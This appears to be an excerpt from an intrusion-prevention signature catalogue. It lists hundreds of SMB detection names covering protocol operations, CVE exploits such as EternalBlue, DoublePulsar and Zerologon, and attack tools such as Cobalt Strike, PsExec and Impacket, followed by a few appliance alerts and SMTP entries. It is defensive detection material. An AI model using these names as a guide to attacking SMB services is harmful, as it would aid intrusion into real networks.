SMB-TCP_CHS-Logoff-AndX-Request
SMB-TCP_CHS-Malware-Filename-Access
SMB-TCP_CHS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
SMB-TCP_CHS-Microsoft-Office-Insecure-Library-Loading
SMB-TCP_CHS-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
SMB-TCP_CHS-Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2010-0029
SMB-TCP_CHS-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082
SMB-TCP_CHS-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
SMB-TCP_CHS-Microsoft-Windows-File-Handling-Component-Remote-Code-Execution
SMB-TCP_CHS-Microsoft-Windows-Media-Center-Insecure-Library-Loading
SMB-TCP_CHS-Microsoft-Windows-Negoex-Buffer-Overflow
SMB-TCP_CHS-Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering
SMB-TCP_CHS-Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution
SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Remote-Code-Execution-MS10-012
SMB-TCP_CHS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read
SMB-TCP_CHS-Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure
SMB-TCP_CHS-Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution
SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition
SMB-TCP_CHS-Microsoft-Windows-Write-AndX-SMB-Processing-DOS
SMB-TCP_CHS-Move-Request
SMB-TCP_CHS-Negotiate-Protocol-Request
SMB-TCP_CHS-Nessus-Vulnerability-Scanner-Usage
SMB-TCP_CHS-No-AndX-Command-Request
SMB-TCP_CHS-Nonstandard-Command-Request
SMB-TCP_CHS-Nonzero-Reserved-Value-In-AndX-Header
SMB-TCP_CHS-Nozero-Error-Field-In-Request
SMB-TCP_CHS-NT-Cancel-Request
SMB-TCP_CHS-NT-Create-AndX-Request
SMB-TCP_CHS-NT-Rename-Request
SMB-TCP_CHS-NT-Transact-Request
SMB-TCP_CHS-NT-Transact-Secondary-Request
SMB-TCP_CHS-NTLM-Authentication-Usage
SMB-TCP_CHS-Null-Session-Samr-Access
SMB-TCP_CHS-Open-AndX-Request
SMB-TCP_CHS-Open-Print-File-Request
SMB-TCP_CHS-Open-Request
SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-1
SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-2
SMB-TCP_CHS-Possible-Nimda-Eml-Spread
SMB-TCP_CHS-Possible-Nimda-Nws-Spread
SMB-TCP_CHS-Possible-Nimda-Riched20-DLL-Spread
SMB-TCP_CHS-Process-Exit-Request
SMB-TCP_CHS-Query-Information-Disk-Request
SMB-TCP_CHS-Query-Information-Request
SMB-TCP_CHS-Query-Information2-Request
SMB-TCP_CHS-Query-Server-Request
SMB-TCP_CHS-Read-AndX-Request
SMB-TCP_CHS-Read-Bulk-Request
SMB-TCP_CHS-Read-MPX-Request
SMB-TCP_CHS-Read-MPX-Secondary-Request
SMB-TCP_CHS-Read-Raw-Request
SMB-TCP_CHS-Read-Request
SMB-TCP_CHS-Rename-Request
SMB-TCP_CHS-Request-Buffer-Overflow
SMB-TCP_CHS-Samba-Long-Password-BO
SMB-TCP_CHS-Samba-SMB-CIFS-Packet-Assembling-BOF-1
SMB-TCP_CHS-Samba-SMB1-Information-Disclosure
SMB-TCP_CHS-Samba-SMB1-Packets-Chaining-Memory-Corruption
SMB-TCP_CHS-Samba-smbd-Flags2-Header-Parsing-DOS
SMB-TCP_CHS-Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS
SMB-TCP_CHS-Samba-Trans2open-BOF-1
SMB-TCP_CHS-Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write
SMB-TCP_CHS-Samba-Wild-Card-DoS
SMB-TCP_CHS-Search-Request
SMB-TCP_CHS-Security-Package-AndX-Request
SMB-TCP_CHS-Seek-Request
SMB-TCP_CHS-Session-Setup-AndX-Request
SMB-TCP_CHS-Set-Information-Request
SMB-TCP_CHS-Set-Information2-Request
SMB-TCP_CHS-Shared-Variable-Fingerprint
SMB-TCP_CHS-SMB-AndX-Chain
SMB-TCP_CHS-SMB-Filename-Obfuscation
SMB-TCP_CHS-SMB-Samba-Dot-Slash-Combination-Directory-Traversal
SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054
SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054-2
SMB-TCP_CHS-SMB2-Cancel-Request
SMB-TCP_CHS-SMB2-Change-Notify-Request
SMB-TCP_CHS-SMB2-Close-Request
SMB-TCP_CHS-SMB2-Compounded-Session_Setup-Request
SMB-TCP_CHS-SMB2-Create-Request
SMB-TCP_CHS-SMB2-Dialect-Requested
SMB-TCP_CHS-SMB2-Echo-Request
SMB-TCP_CHS-SMB2-Flush-Request
SMB-TCP_CHS-SMB2-IOCTL-Request
SMB-TCP_CHS-SMB2-Lock-Request
SMB-TCP_CHS-SMB2-Logoff-Request
SMB-TCP_CHS-SMB2-Logoff-Request-With-Compounding
SMB-TCP_CHS-SMB2-Negotiate-Request
SMB-TCP_CHS-SMB2-Negotiate-Session_Setup-Or-Echo-Request-With-Compounding
SMB-TCP_CHS-SMB2-Oplock-Break-Request
SMB-TCP_CHS-SMB2-Query-Directory-Request
SMB-TCP_CHS-SMB2-Query-Info-Request
SMB-TCP_CHS-SMB2-Read-Request
SMB-TCP_CHS-SMB2-Session-Setup-Request
SMB-TCP_CHS-SMB2-Set-Info-Request
SMB-TCP_CHS-SMB2-Tree-Connect-Request
SMB-TCP_CHS-SMB2-Tree-Connect-Request-With-Compounding
SMB-TCP_CHS-SMB2-Tree-Disconnect-Request
SMB-TCP_CHS-SMB2-Unknown-Request
SMB-TCP_CHS-SMB2-Write-Request
SMB-TCP_CHS-SMB3-Negotiate-Chained-Compression-Supported
SMB-TCP_CHS-SMB3-Negotiate-Chained-Compression-Unsupported
SMB-TCP_CHS-Sysvol-Share-Traffic
SMB-TCP_CHS-Trans-Secondary-Request
SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001
SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001-2
SMB-TCP_CHS-Transaction-Command-Nonzero-Reserved-Field
SMB-TCP_CHS-Transaction-Request
SMB-TCP_CHS-Transaction-Secondary-Request
SMB-TCP_CHS-Transaction2-Request
SMB-TCP_CHS-Transaction2-Secondary-Request
SMB-TCP_CHS-Tree-Connect-AndX-Request
SMB-TCP_CHS-Tree-Connect-Request
SMB-TCP_CHS-Tree-Disconnect-Request
SMB-TCP_CHS-Unimplemented-Command-Com-Close-And-Tree-Disc
SMB-TCP_CHS-Unimplemented-Command-Com-New-File-Size
SMB-TCP_CHS-Unlock-Byte-Range-Request
SMB-TCP_CHS-Windows-Admin-Share-Default-Password-Access
SMB-TCP_CHS-Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812
SMB-TCP_CHS-Windows-Server-Message-Block-Vulnerability
SMB-TCP_CHS-Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642
SMB-TCP_CHS-Write-And-Close-Request
SMB-TCP_CHS-Write-And-Unlock-Request
SMB-TCP_CHS-Write-AndX-Abnormal-Write-Mode-Usage
SMB-TCP_CHS-Write-AndX-Request
SMB-TCP_CHS-Write-Bulk-Data-Request
SMB-TCP_CHS-Write-Bulk-Request
SMB-TCP_CHS-Write-Complete-Request
SMB-TCP_CHS-Write-MPX-Request
SMB-TCP_CHS-Write-MPX-Secondary-Request
SMB-TCP_CHS-Write-Print-File-Request
SMB-TCP_CHS-Write-Raw-Request
SMB-TCP_CHS-Write-Request
SMB-TCP_CHS_Corel-Multiple-Products-Multiple-Insecure-Library-Loading
SMB-TCP_CHS_Corel-Paintshop-Pro-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
SMB-TCP_CHS_Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688
SMB-TCP_CHS_Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
SMB-TCP_CHS_Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
SMB-TCP_CHS_Microsoft-Visual-Studio-MFC-Insecure-Library-Loading
SMB-TCP_CHS_MS-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
SMB-TCP_CHS_Oracle-Java-Runtime-Environment-Insecure-File-Loading
SMB-TCP_CHS_Soda-PDF-Insecure-Library-Loading
SMB-TCP_CHS_Suspicious-Request
SMB-TCP_CHS_Wireshark-Insecure-Search-Path-Script-Execution
SMB-TCP_Cobalt-Strike-Named-Pipe
SMB-TCP_CS-Microsoft-Windows-Search-Information-Disclosure
SMB-TCP_CS-Microsoft-Windows-Search-Type-Confusion
SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE
SMB-TCP_CS-Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure
SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Information-Disclosure-2
SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-2
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-3
SMB-TCP_CS-MSRPC-Bind-Over-SMB2
SMB-TCP_CS-Samba-SMB1-Smb_request_done-Use-After-Free
SMB-TCP_CS-Trans2-DoublePulsar-Request
SMB-TCP_CS_Suspected-APT-Traffic-Pattern
SMB-TCP_EternalBlue-Large-Buffer
SMB-TCP_Failed-Session-Setup
SMB-TCP_FireEye-Red-Team-Tool-IMPACKETOBF-Smbexec
SMB-TCP_FR-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
SMB-TCP_FR-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Download
SMB-TCP_FR-Executable-File-Read
SMB-TCP_FR-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
SMB-TCP_FR-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FR-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_FW-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
SMB-TCP_FW-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Upload
SMB-TCP_FW-Executable-File-Write
SMB-TCP_FW-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FW-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_Impacket-Generated-Traffic
SMB-TCP_Internet-Explorer-Authentication-Reflection-Code-Execution
SMB-TCP_Known-EternalBlue-Probe-Echo-Reply
SMB-TCP_Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write
SMB-TCP_Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability
SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service
SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference
SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion
SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read
SMB-TCP_Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow
SMB-TCP_Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
SMB-TCP_Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
SMB-TCP_Microsoft-Office-Groove-Insecure-Library-Loading
SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities
SMB-TCP_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow
SMB-TCP_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
SMB-TCP_Microsoft-SRV.SYS-Pipe-Transaction-No-Null-DoS
SMB-TCP_Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868
SMB-TCP_Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
SMB-TCP_Microsoft-Windows-DVR-MS-CVE-2011-0042
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
SMB-TCP_Microsoft-Windows-Internet-Printing-Service-Integer-Overflow
SMB-TCP_Microsoft-Windows-Media-Center-MCL-File-Code-Execution
SMB-TCP_Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
SMB-TCP_Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228
SMB-TCP_Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access
SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet
SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet-DOS
SMB-TCP_Microsoft-Windows-Server-Service-Authorization-Weakness
SMB-TCP_Microsoft-Windows-Shell-File-Name-Code-Execution
SMB-TCP_Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
SMB-TCP_Microsoft-Windows-SMB-Client-Pool-Corruption
SMB-TCP_Microsoft-Windows-SMB-Client-Race-Condition
SMB-TCP_Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption
SMB-TCP_Microsoft-Windows-SMB-Client-Transaction-BOF-Exploit-CVE-2010-0270
SMB-TCP_Microsoft-Windows-SMB-Response-Handling-Buffer-Overflow
SMB-TCP_Microsoft-Windows-SMB-Search-Request-Buffer-Overflow
SMB-TCP_Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022
SMB-TCP_Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
SMB-TCP_Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow
SMB-TCP_Microsoft-Windows-SMBv3-Compression-Information-Disclosure
SMB-TCP_Microsoft-Windows-Vulnerability-CVE-2020-17140
SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
SMB-TCP_Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703
SMB-TCP_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301
SMB-TCP_Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796
SMB-TCP_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
SMB-TCP_MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
SMB-TCP_Negotiate-Protocol-Smb2-Remote-Code-Execution
SMB-TCP_Novell-Client-NetIdentity-Agent-Pointer-Dereference-Exploit
SMB-TCP_Novell-NetWare-CIFS.NLM-Buffer-Overflow
SMB-TCP_Oracle-Database-DBMS-Assert-Filter-Bypass
SMB-TCP_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
SMB-TCP_Oracle-Database-Server-SQL-Query-Directory-Traversal
SMB-TCP_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
SMB-TCP_Oracle-Sys-Pbsde-Init-BOF
SMB-TCP_Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691
SMB-TCP_PetitPotam-NTLM-Relay-Attack
SMB-TCP_Possible-Shamoon-DistTrack-Spreading-Attempt
SMB-TCP_PsExec-Named-Pipe-Detected
SMB-TCP_Samba-Authentication-Bypass
SMB-TCP_Samba-Mangling-Method-Buffer-Overflow
SMB-TCP_Samba-MS-RPC-Remote-Command-Execution
SMB-TCP_Samba-Nmbd-Unstrcpy-Buffer-Overflow
SMB-TCP_Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service
SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share
SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share-2
SMB-TCP_Samba-Root-File-System-Access-Security-Bypass
SMB-TCP_Samba-Security-Descriptor-Parsing-Integer-Overflow
SMB-TCP_Samba-Sid-Parsing-Stack-Buffer-Overflow
SMB-TCP_Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure
SMB-TCP_Samba-smdb-Packets-Chaining-AndX-Offset-Infinite-Loop
SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service
SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service
SMB-TCP_Samba-Unicode-Filename-Buffer-Overflow
SMB-TCP_SC-At-Scheduler-JobAdd
SMB-TCP_SC-At-Scheduler-JobDelete
SMB-TCP_SC-Remote-Create-Service
SMB-TCP_SC-Remote-Delete-Service
SMB-TCP_SC-Remote-Start-Service
SMB-TCP_SC-Remote-Stop-Service
SMB-TCP_Shared-Variable-Fingerprint
SMB-TCP_SHS-Check-Directory-Fail
SMB-TCP_SHS-Check-Directory-Success
SMB-TCP_SHS-Close-Fail
SMB-TCP_SHS-Close-Print-File-Fail
SMB-TCP_SHS-Close-Print-File-Success
SMB-TCP_SHS-Close-Success
SMB-TCP_SHS-Copy-Fail
SMB-TCP_SHS-Copy-Success
SMB-TCP_SHS-Create-Directory-Fail
SMB-TCP_SHS-Create-Directory-Success
SMB-TCP_SHS-Create-Fail
SMB-TCP_SHS-Create-New-Fail
SMB-TCP_SHS-Create-New-Success
SMB-TCP_SHS-Create-Success
SMB-TCP_SHS-Create-Temporary-Fail
SMB-TCP_SHS-Create-Temporary-Success
SMB-TCP_SHS-Delete-Directory-Fail
SMB-TCP_SHS-Delete-Directory-Success
SMB-TCP_SHS-Delete-Fail
SMB-TCP_SHS-Delete-Success
SMB-TCP_SHS-Echo-Response-Success
SMB-TCP_SHS-EternalBlue-Probe
SMB-TCP_SHS-Find-Close-Fail
SMB-TCP_SHS-Find-Close-Success
SMB-TCP_SHS-Find-Close2-Fail
SMB-TCP_SHS-Find-Close2-Success
SMB-TCP_SHS-Find-Fail
SMB-TCP_SHS-Find-Notify-Close-Fail
SMB-TCP_SHS-Find-Notify-Close-Success
SMB-TCP_SHS-Find-Success
SMB-TCP_SHS-Find-Unique-Fail
SMB-TCP_SHS-Find-Unique-Success
SMB-TCP_SHS-Flush-Fail
SMB-TCP_SHS-Flush-Success
SMB-TCP_SHS-Get-Print-Queue-Fail
SMB-TCP_SHS-Get-Print-Queue-Success
SMB-TCP_SHS-Invalid-Command-Fail
SMB-TCP_SHS-Invalid-Command-Success
SMB-TCP_SHS-IOCTL-Fail
SMB-TCP_SHS-IOCTL-Secondary-Fail
SMB-TCP_SHS-IOCTL-Secondary-Success
SMB-TCP_SHS-IOCTL-Success
SMB-TCP_SHS-Lock-And-Read-Fail
SMB-TCP_SHS-Lock-And-Read-Success
SMB-TCP_SHS-Lock-Byte-Range-Fail
SMB-TCP_SHS-Lock-Byte-Range-Success
SMB-TCP_SHS-Locking-AndX-Fail
SMB-TCP_SHS-Locking-AndX-Success
SMB-TCP_SHS-Logoff-AndX-Fail
SMB-TCP_SHS-Logoff-AndX-Success
SMB-TCP_SHS-Microsoft-Windows-SMB-Client-Transaction-BOF-MS05-011
SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324
SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325
SMB-TCP_SHS-Move-Fail
SMB-TCP_SHS-Move-Success
SMB-TCP_SHS-Multiple-Tree-Connections
SMB-TCP_SHS-Negotiate-Protocol-Response-Fail
SMB-TCP_SHS-Negotiate-Protocol-Response-Success
SMB-TCP_SHS-No-AndX-Command-Fail
SMB-TCP_SHS-No-AndX-Command-Success
SMB-TCP_SHS-Nonstandard-Command-Failed-Reply
SMB-TCP_SHS-Nonstandard-Command-Success-Reply
SMB-TCP_SHS-NT-Cancel-Fail
SMB-TCP_SHS-NT-Cancel-Success
SMB-TCP_SHS-NT-Create-AndX-Fail
SMB-TCP_SHS-NT-Create-AndX-Success
SMB-TCP_SHS-NT-Rename-Fail
SMB-TCP_SHS-NT-Rename-Success
SMB-TCP_SHS-NT-Transact-Fail
SMB-TCP_SHS-NT-Transact-Secondary-Fail
SMB-TCP_SHS-NT-Transact-Secondary-Success
SMB-TCP_SHS-NT-Transact-Success
SMB-TCP_SHS-NTLM-Authentication-Usage
SMB-TCP_SHS-Open-AndX-Fail
SMB-TCP_SHS-Open-AndX-Success
SMB-TCP_SHS-Open-Fail
SMB-TCP_SHS-Open-Print-File-Fail
SMB-TCP_SHS-Open-Print-File-Success
SMB-TCP_SHS-Open-Success
SMB-TCP_SHS-Process-Exit-Fail
SMB-TCP_SHS-Process-Exit-Success
SMB-TCP_SHS-Query-Information-Disk-Fail
SMB-TCP_SHS-Query-Information-Disk-Success
SMB-TCP_SHS-Query-Information-Fail
SMB-TCP_SHS-Query-Information-Success
SMB-TCP_SHS-Query-Information2-Fail
SMB-TCP_SHS-Query-Information2-Success
SMB-TCP_SHS-Query-Server-Fail
SMB-TCP_SHS-Query-Server-Success
SMB-TCP_SHS-Read-AndX-Fail
SMB-TCP_SHS-Read-AndX-Success
SMB-TCP_SHS-Read-Bulk-Fail
SMB-TCP_SHS-Read-Bulk-Success
SMB-TCP_SHS-Read-Fail
SMB-TCP_SHS-Read-MPX-Fail
SMB-TCP_SHS-Read-MPX-Secondary-Fail
SMB-TCP_SHS-Read-MPX-Secondary-Success
SMB-TCP_SHS-Read-MPX-Success
SMB-TCP_SHS-Read-Raw-Fail
SMB-TCP_SHS-Read-Raw-Success
SMB-TCP_SHS-Read-Success
SMB-TCP_SHS-Rename-Fail
SMB-TCP_SHS-Rename-Success
SMB-TCP_SHS-Samba-SMB1-Message_Push_String-Information-Disclosure
SMB-TCP_SHS-Search-Fail
SMB-TCP_SHS-Search-Success
SMB-TCP_SHS-Security-Package-AndX-Fail
SMB-TCP_SHS-Security-Package-AndX-Success
SMB-TCP_SHS-Seek-Fail
SMB-TCP_SHS-Seek-Success
SMB-TCP_SHS-Session-Setup-AndX-Fail
SMB-TCP_SHS-Session-Setup-AndX-Success
SMB-TCP_SHS-Set-Information-Fail
SMB-TCP_SHS-Set-Information-Success
SMB-TCP_SHS-Set-Information2-Fail
SMB-TCP_SHS-Set-Information2-Success
SMB-TCP_SHS-SMB2-Cancel-Response
SMB-TCP_SHS-SMB2-Change-Notify-Response
SMB-TCP_SHS-SMB2-Close-Response
SMB-TCP_SHS-SMB2-Create-Response
SMB-TCP_SHS-SMB2-Echo-Response
SMB-TCP_SHS-SMB2-Flush-Response
SMB-TCP_SHS-SMB2-IOCTL-Response
SMB-TCP_SHS-SMB2-Lock-Response
SMB-TCP_SHS-SMB2-Logoff-Response
SMB-TCP_SHS-SMB2-Negotiate-Response
SMB-TCP_SHS-SMB2-Oplock-Break-Response
SMB-TCP_SHS-SMB2-Query-Directory-Response
SMB-TCP_SHS-SMB2-Query-Info-Response
SMB-TCP_SHS-SMB2-Read-Response
SMB-TCP_SHS-SMB2-Session-Setup-Response
SMB-TCP_SHS-SMB2-Set-Info-Response
SMB-TCP_SHS-SMB2-Tree-Connect-Response
SMB-TCP_SHS-SMB2-Tree-Connect-Response-Too-Long
SMB-TCP_SHS-SMB2-Tree-Disconnect-Response
SMB-TCP_SHS-SMB2-Write-Response
SMB-TCP_SHS-SMB3-Negotiate-Response
SMB-TCP_SHS-Transaction-Fail
SMB-TCP_SHS-Transaction-Secondary-Fail
SMB-TCP_SHS-Transaction-Secondary-Success
SMB-TCP_SHS-Transaction-Success
SMB-TCP_SHS-Transaction2-Fail
SMB-TCP_SHS-Transaction2-Secondary-Fail
SMB-TCP_SHS-Transaction2-Secondary-Success
SMB-TCP_SHS-Transaction2-Success
SMB-TCP_SHS-Tree-Connect-AndX-Fail
SMB-TCP_SHS-Tree-Connect-AndX-Success
SMB-TCP_SHS-Tree-Connect-Fail
SMB-TCP_SHS-Tree-Connect-Success
SMB-TCP_SHS-Tree-Disconnect-Fail
SMB-TCP_SHS-Tree-Disconnect-Success
SMB-TCP_SHS-Unlock-Byte-Range-Fail
SMB-TCP_SHS-Unlock-Byte-Range-Success
SMB-TCP_SHS-Write-And-Close-Fail
SMB-TCP_SHS-Write-And-Close-Success
SMB-TCP_SHS-Write-And-Unlock-Fail
SMB-TCP_SHS-Write-And-Unlock-Success
SMB-TCP_SHS-Write-AndX-Fail
SMB-TCP_SHS-Write-AndX-Success
SMB-TCP_SHS-Write-Bulk-Data-Fail
SMB-TCP_SHS-Write-Bulk-Data-Success
SMB-TCP_SHS-Write-Bulk-Fail
SMB-TCP_SHS-Write-Bulk-Success
SMB-TCP_SHS-Write-Complete-Fail
SMB-TCP_SHS-Write-Complete-Success
SMB-TCP_SHS-Write-Fail
SMB-TCP_SHS-Write-MPX-Fail
SMB-TCP_SHS-Write-MPX-Secondary-Fail
SMB-TCP_SHS-Write-MPX-Secondary-Success
SMB-TCP_SHS-Write-MPX-Success
SMB-TCP_SHS-Write-Print-File-Fail
SMB-TCP_SHS-Write-Print-File-Success
SMB-TCP_SHS-Write-Raw-Fail
SMB-TCP_SHS-Write-Raw-Success
SMB-TCP_SHS-Write-Success
SMB-TCP_SMB-Client-Memory-Allocation-CVE-2010-0269
SMB-TCP_SMB-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
SMB-TCP_SMB-Search-Buffer-Overflow-MS08-063
SMB-TCP_SS-Echo-Response-Fail
SMB-TCP_SS-Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333
SMB-TCP_SS-Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal
SMB-TCP_SS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713-2
SMB-TCP_SS-Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284
SMB-TCP_SS-Trans2-DoublePulsar-Response
SMB-TCP_Suspicious-Server-Response
SMB-TCP_Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690
SMB-TCP_VMware-ESXi-Authentication-Bypass-CVE-2024-37085
SMB-TCP_Windows-Explorer-HTA-CLSID-System-Compromise
SMB-TCP_Windows-Filename-Parsing-Vulnerability-2
SMB-TCP_Windows-Named-Pipe-Execution-Status-Unset
SMB-TCP_Windows-Search-Protocol-Named-Pipe-MsFteWds
SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543-2
SMB-TCP_Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660
SMB-TCP_Windows-SMB-Remote-Code-Execution-Vulnerability
SMB2
SMB2_Invalid-Tree-Identifier
SMB2_Message-After-SMB-Negotiated
SMB2_Named-Pipe-Failed-Write
SMB2_Named-Pipe-Mid-Pipeline-Failed-Write
SMB2_Named-Pipe-Write-After-Failed-Write
SMB2_Named-Pipe-Write-Pipeline-Overflow
SMB2_Named-Pipe-Write-Pipeline-Underflow
SMB2_Named-Pipe-Write-Pipelining
SMB2_Negotiated
SMB2_Request-Pipeline-Overflow
SMB2_Unknown-File-Identifier
SMB2_Unknown-Message-Identifier
SMB2_Unknown-Tree-Identifier
SMB3
SMB_Attempted-Tree-Connect-To-ADMIN$
SMB_Attempted-Tree-Connect-To-C$
SMB_Attempted-Tree-Connect-To-D$
SMB_Attempted-Tree-Connect-To-Other
SMB_Attempted-Write-To-ADMIN$
SMB_Attempted-Write-To-C$
SMB_Attempted-Write-To-D$
SMB_Attempted-Write-To-Other
SMB_Command-Pipeline-Overflow
SMB_Command-Pipeline-Underflow
SMB_Message-After-SMB2-Negotiated
SMB_Named-Pipe-Failed-Write
SMB_Named-Pipe-Large-Write
SMB_Named-Pipe-Mid-Pipeline-Failed-Write
SMB_Named-Pipe-Write-After-Failed-Write
SMB_Named-Pipe-Write-Pipeline-Overflow
SMB_Named-Pipe-Write-Pipeline-Underflow
SMB_Named-Pipe-Write-Pipelining
SMB_Negotiated
SMB_Successful-Write-To-ADMIN$
SMB_Successful-Write-To-C$
SMB_Successful-Write-To-D$
SMB_Successful-Write-To-Other
SMB_Unknown-File-Identifier
SMB_Write-AndX-Raw-Write-Mode
SMB_Write-AndX-Unknown-Write-Mode
SMC API HTTPS Certificate expires soon
SMC API HTTPS Certificate has expired
SMC Appliance patch installation failed
SMC Server: disk error
SME-Group
SMEStorage
SMG
Smilebox
Smore
SMScloud
SMTP
SMTP-Transaction-None
SMTP.com
SMTP_Angle-Bracket-Missing
SMTP_Angle-Bracket-Missing-Success
SMTP_Bash-Shellshock-Code-Injection
SMTP_CCS-Asn-1-Integer-BOF-MS04-007
SMTP_CCS-Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
